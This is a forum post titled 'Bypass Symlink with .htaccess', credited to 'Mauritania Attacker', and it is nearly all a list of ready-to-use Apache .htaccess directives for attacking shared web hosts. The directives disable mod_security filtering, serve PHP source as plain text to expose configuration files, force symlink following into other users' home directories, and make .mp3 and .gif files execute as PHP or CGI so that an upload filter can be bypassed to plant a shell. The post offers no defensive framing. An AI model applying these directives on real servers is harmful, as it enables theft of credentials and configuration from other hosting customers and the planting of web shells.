Jump to content
pedala1

Bypass Symlink with .htaccess

By pedala1, in Tutoriale in engleza

Recommended Posts

pedala1 Newbie

pedala1

Posted
Posted

*********************Bypass Symlink with .htaccess bY Mauritania Attacker************************

i will write down for you all .htaccess possible

* Options FollowSymLinks MultiViews Indexes ExecCGI

* Options Indexes FollowSymLinks DirectoryIndex ssssss.htm AddType txt .php AddHandler txt .php

* Options All DirectoryIndex ssss.html addType txt .php AddHandler txt .php <IfModule mod_security.c> SecFilterEngine Off SecFilterScanPOST Off </IfModule>

* Options All ReadMeName 1.txt

* suPHP_ConfigPath /home/user/public_html/php.ini

* Options all

* Options +FollowSymLinks DirectoryIndex Sux.html Options +Indexes AddType text/plain .php AddHandler server-parsed .php AddType text/plain .html

* Options Indexes FollowSymLinks DirectoryIndex ssssss.htm AddType txt .php AddHandler txt .php <IfModule mod_autoindex.c> IndexOptions FancyIndexing IconsAreLinks SuppressHTMLPreamble </ifModule> <IfModule mod_security.c> SecFilterEngine Off SecFilterScanPOST Off </IfModule>

This one is to make python work :

* AddType application/x-httpd-cgi .py AddHandler cgi-script .py AddHandler cgi-script .py

This one is to make perl work :

* AddType application/x-httpd-cgi .pl AddHandler cgi-script .pl AddHandler cgi-script .pl

This one is to enable Symlink if the function is disabled in the server :

* <Directory "/home"> *** Options -ExecCGI* *** AllowOverride AuthConfig Indexes Limit FileInfo Options=IncludesNOEXEC,Indexes,Includes,MultiViews ,SymLinksIfOwnerMatch,FollowSymLinks </Directory>

This one is to retrieve users permissions :

* AddType text/plain .php Options +Indexes DirectoryIndex filename.html

* Bypass Internal Server error :

<IfModule mod_security.c> SecFilterEngine Off SecFilterScanPOST Off </IfModule>

* Change php version :

AddType application/x-httpd-php4 .php

* Bypass Uploads Options and upload shell in another extension :

<FilesMatch "^.*\.mp3"> SetHandler application/x-httpd-php </FilesMatch>

* Retrieve Config with picture method :

Options FollowSymLinks MultiViews Indexes ExecCGI

AddType application/x-httpd-cgi .gif

AddHandler cgi-script .gif

AddHandler cgi-script .gif

Bypass Symlink Private 2013 - Pastebin.com

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...